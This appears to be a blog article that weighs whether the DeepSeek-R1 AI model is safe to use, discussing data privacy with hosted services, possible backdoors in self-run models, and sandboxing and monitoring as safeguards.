Is DeepSeek safe?

In recent days, the company DeepSeek has launched its AI model DeepSeek-R1, which has attracted a lot of attention. It is technically interesting, but its origins in a Chinese company have created uncertainty about how to use it.

Using online services - always a risk

First, one should always be careful when using online services. The data sent to the service's servers can, in principle, be used by the service provider to do whatever it wants, especially in the case of free customers.

As a paying customer, you have a contract with the service, which may state that they will not store or otherwise use the data you send them. Such clauses are quite common. However, as with any promise, you need to consider how much you trust them.

The risk of data being used in other ways or shared with other actors must also be taken into account. Technology companies sometimes work closely with their countries' military and security services, which may be an aspect to consider.

Using online services - always a risk

If you are running on your own hardware, the situation is slightly different. DeepSeek-R1 is so easy to run that it can be downloaded and run with reasonable effort. There have been examples of people running it on a stack of Mac Minis, which is both creative and impressive.

Shouldn't this be risk-free? Well, yes. An AI model of this type consists not only of data (the weights it learned for all its parameters during training) but also of code.

In this code, there could theoretically be technical backdoors - for example, functions that pick data and send it somewhere else.

Code from external sources - always a matter of trust

The risk of hidden features is of course not unique to this case. As soon as you install code written by someone else, you trust that it does not contain unexpected features.

We trust whoever provided the operating system, whoever developed the word processor or spreadsheet program, and whoever is behind all the nifty little tools we regularly install. But this trust is never a given - and that goes for AI models too.

Safeguards - sandbox and monitoring

If you are running an AI model, or other software that you are not completely sure about, it should be done in a sandbox where you closely monitor what it does.

For example, you should check if the model tries to connect to the network or save data to disk. There may also be hidden functions that are activated only after a certain time or at specific events.

Open source reduces risk, but does not eliminate it

Because DeepSeek-R1 is open source the risk of hidden features is likely to be slightly lower. So far, there have been no such discoveries reported, neither for R1 nor the previously released V3.

It would also be extremely damaging to DeepSeek's reputation if they were caught sneaking Trojans into a model that has received so much attention.

Conclusion - "it depends"

So, is DeepSeek safe? As always, the answer is: it depends.

• It depends on the data you use.
• It depends on the operating environment in which you run the model: hosted by someone else, in a cloud where you install it yourself, or on-premises.
• It depends on how you monitor it.
• It depends on other aspects that are unique to you and your use.

For all these factors, you need to analyze what threats exist and what could be exposed. DeepSeek is definitely not something to be trusted blindly, but there are certainly ways to try the model and evaluate its performance.